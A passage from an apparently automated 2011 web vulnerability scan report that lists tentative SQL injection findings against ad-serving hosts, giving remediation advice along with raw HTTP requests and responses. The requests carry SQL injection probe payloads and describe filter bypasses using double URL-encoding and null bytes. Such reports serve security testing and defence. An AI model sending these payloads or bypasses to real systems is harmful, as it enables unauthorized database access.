34.67. http://syndication.jobthread.com/jt/syndication/page.php

34.68. http://technolog.msnbc.redacted/_vine/printer

34.69. http://thelastword.msnbc.redacted/_vine/printer

34.70. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

34.71. http://vms.redacted/vms.aspx

34.72. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

34.73. http://wrapper.g.redacted/GRedirect.aspx

34.74. http://www.bing.com/events/search

34.75. http://www.bing.com/maps/

34.76. http://www.bing.com/maps/default.aspx

34.77. http://www.bing.com/maps/explore/

34.78. http://www.bing.com/msnhomepagehistory.aspx

34.79. http://www.bing.com/news/results.aspx

34.80. http://www.bing.com/news/search

34.81. http://www.bing.com/sck

34.82. http://www.bing.com/search

34.83. http://www.bing.com/shopping

34.84. http://www.bing.com/shopping/bird-feeders/search

34.85. http://www.bing.com/shopping/content/search

34.86. http://www.bing.com/shopping/makeup/c/4259

34.87. http://www.bing.com/shopping/search

34.88. http://www.bing.com/shopping/swimwear/c/4503

34.89. http://www.bing.com/travel/

34.90. http://www.bing.com/travel/content/search

34.91. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

34.92. http://www.bing.com/travel/deals/last-minute-flight-deals.do

34.93. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

34.94. http://www.bing.com/videos/services/user/info

34.95. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

34.96. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

34.97. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

34.98. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

34.99. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

34.100. http://www.co2stats.com/propres.php

34.101. http://www.codeplex.com/site/analyticsid.aspx

34.102. http://www.facebook.com/extern/login_status.php

34.103. http://www.hoovers.com/favicon.ico

34.104. http://www.kanoodle.com/ajax/search_spy_data.html

34.105. http://www.kanoodle.com/ajax/search_spy_data_today.html

34.106. http://www.kanoodle.com/images/kanoodle-lightbulb-home.gif

34.107. http://www.newsvine.com/_action/article/emailThis

34.108. http://www.newsvine.com/_action/user/startTracking

34.109. http://www.newsvine.com/_action/user/stopTracking

34.110. http://www.newsvine.com/_vine/m2

34.111. http://www.newsvine.com/_vine/printer

34.112. http://www.polls.newsvine.com/_vine/printer

34.113. http://www.reimage.com/images/reimage.ico

34.114. http://www.reimage.com/lp/nhome/css/fonts/candelabook-webfont.woff

34.115. http://www.scientificamerican.com/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3

34.116. http://www.scientificamerican.com/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3

34.117. http://www.scientificamerican.com/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3

34.118. http://www.scout.com/webproxy.ashx

34.119. http://www.silverlight.net/resources/script/omniture/analyticsid.aspx

34.120. http://www.tigerdirect.com/secure/captcha/JpegImage.aspx

34.121. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd

34.122. http://www.w3.org/TR/html4/strict.dtd

34.123. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

35. Content type is not specified

35.1. http://l.player.ooyala.com/errors/report

35.2. http://l.player.ooyala.com/verify

35.3. https://login.live.com/hiphelp.srf

35.4. http://news.ycombinator.com/newest

35.5. http://news.ycombinator.com/news



1. SQL injection  next
There are 134 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The TargetID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d1--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d2--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6381

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 699

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00'&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6398
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00''&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 711
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The &PID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6634

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 16:06:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Screener_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU";
ctp[1] = "clickTag1";
ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";


var fv='"m
...[SNIP]...

Request 2

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6466

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:41:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex =
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/864449/decide.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

